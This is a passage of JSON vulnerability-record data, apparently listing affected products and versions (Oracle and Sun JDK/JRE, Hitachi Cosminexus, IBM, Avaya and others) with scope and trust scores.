"trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jre 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 28", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 71", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server standard 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0 26", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 43", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 30", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.5.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 18", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.7" }, { "model": "jre 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 01", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 12", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 12", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 36", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.7.0 13", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 22", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 35", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.6.0 65", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 12", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.5.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus application server enterprise 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jdk 1.5.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 23", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 33", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "0107-00" }, { "model": "jre 22", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "api management", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "2.0.0.0" }, { "model": "api management", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "2.0.0.1" }, { "model": "api management", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "2.0.0.2" }, { "model": "api management", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "3.0.0.0" }, { "model": "domino", "scope": "lte", "trust": 0.8, "vendor": "ibm", "version": "8.5.3 fix pack 6" }, { "model": "domino", "scope": "lte", "trust": 0.8, "vendor": "ibm", "version": "9.0.1 fix pack 1" }, { "model": "fabric manager", "scope": "lte", "trust": 0.8, "vendor": "ibm", "version": "4.1.00.22" }, { "model": "financial transaction manager", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "for ach services 2.1.1.0" }, { "model": "financial transaction manager", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "for check services 2.1.1.2" }, { "model": "financial transaction manager", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "for check services 2.1.1.5" }, { "model": "financial transaction manager", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "for corporate payment services 2.1.1.0" }, { "model": "ims enterprise suite", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "of soap gateway 2.1" }, { "model": "ims enterprise suite", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "of soap gateway 2.2" }, { "model": "ims enterprise suite", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "of soap gateway 3.1" }, { "model": "infosphere data replication", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "dashboard 10.1" }, { "model": "infosphere data replication", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "dashboard 10.2" }, { "model": "infosphere data replication", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "dashboard 10.2.1" }, { "model": "infosphere data replication", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "dashboard 9.7" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "1.0.1" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "3.2.1" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "version 1.0" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "version 2.0" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "version 3.0" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "version 3.1" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "version 3.2" }, { "model": "lotus quickr", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "8.5 for websphere portal" }, { "model": "notes", "scope": "lte", "trust": 0.8, "vendor": "ibm", "version": "8.5.3 fix pack 6" }, { "model": "notes", "scope": "lte", "trust": 0.8, "vendor": "ibm", "version": "9.0.1 fix pack 1" }, { "model": "security access manager for mobile the appliance", "scope": null, "trust": 0.8, "vendor": "ibm", "version": null }, { "model": "security access manager for mobile software", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "8.0" }, { "model": "security access manager for web the appliance", "scope": null, "trust": 0.8, "vendor": "ibm", "version": null }, { "model": "security access manager for web software", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "7.0" }, { "model": "security access manager for web software", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "8.0" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "2.1 to 2.1 fix pack 4" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "2.3 fix pack 1" }, { "model": "websphere ilog jrules", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "7.0" }, { "model": "rational connector for sap solution manager", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "4.0.0.x" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "6.0 (studio)" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "6.1 (studio)" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "6.3 (studio)" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "6.4 (studio)" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "7.0 (studio)" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "live 6.3 (saas offering)" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "live 7.0 (saas offering)" }, { "model": "websphere cast iron cloud integration virtual appliance", "scope": null, "trust": 0.8, "vendor": "ibm", "version": null }, { "model": "websphere cast iron cloud integration physical appliance", "scope": null, "trust": 0.8, "vendor": "ibm", "version": null }, { "model": "jdk", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "5.0 update 61" }, { "model": "jdk", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "6 update 71" }, { "model": "jdk", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "7 update 51" }, { "model": "jdk", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "8" }, { "model": "jre", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "5.0 update 61" }, { "model": "jre", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "6 update 71" }, { "model": "jre", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "7 update 51" }, { "model": "jre", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "8" }, { "model": "java se", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "embedded 7 update 51" }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "cosminexus application server version 5", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus client", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "cosminexus developer light version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer standard version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer version 5", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer\u0027s kit for java", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base" }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 5" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "-r" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "express" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "light" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "standard-r" }, { "model": "ucosminexus application server enterprise", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server smart edition", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "for plug-in" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "01" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional for plug-in" }, { "model": "ucosminexus developer light", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus operator", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base" }, { "model": "ucosminexus server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "standard-r" }, { "model": "ucosminexus service architect", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "- messaging" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "cosminexus application server enterprise )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus application server 05-05-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server standard 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jdk 1.7.0 17", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "cosminexus client", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "jdk 01-b06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.6" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus developer", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "05-00" }, { "model": "jre 1.5.0.0 09", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus studio 05-05-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "jre", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "1.8" }, { "model": "cosminexus application server standard )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus application server enterprise 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "05-00" }, { "model": "jre 1.7.0 21", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "cosminexus client )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "jdk .0 04", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "cosminexus developer 05-05-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus client 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server enterprise 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "jdk 1.5.0 41", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "cosminexus developer professional", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "cosminexus primary server base 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "jdk 1.5.0.0 08", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 12", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus developer professional 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus client", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "0108-50" }, { "model": "cosminexus application server standard 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "jdk .0 03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 12", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "cosminexus application server standard 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jre 1.6.0 2", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "cosminexus developer professional 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "cosminexus primary server base 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "jdk 07-b03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus primary server base 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0.0 08", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "jre 1.5.0 45", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0.0 12", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus client )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "jdk", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "1.8" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "cosminexus application server", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "05-00" }, { "model": "jdk 1.5.0.0 09", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "cosminexus developer professional )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "cosminexus client 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "-08-50" }, { "model": "cosminexus application server enterprise 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jdk 1.5.0.0 11", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 11-b03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "cosminexus developer professional )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus application server enterprise )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "cosminexus application server standard )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus client 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0.0 07", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 01", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 20", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus application server light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.30" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0107-10" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.0" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.17" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.2" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.0" }, { "model": "junos space ja1500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.5" }, { "model": "cosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.47" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "content collector for sap applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.1" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cosminexus application server standard 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.10" }, { "model": "cosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-50" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "cosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.43" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "cosminexus application server enterprise 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "cosminexus application server 05-00-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "db2 accessories suite", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "cosminexus application server enterprise 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1" }, { "model": "jrockit r28.3.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "ucosminexus developer (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0108-00" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.35" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.39" }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "ims explorer for development", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus application server enterprise 06-71-/m", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, 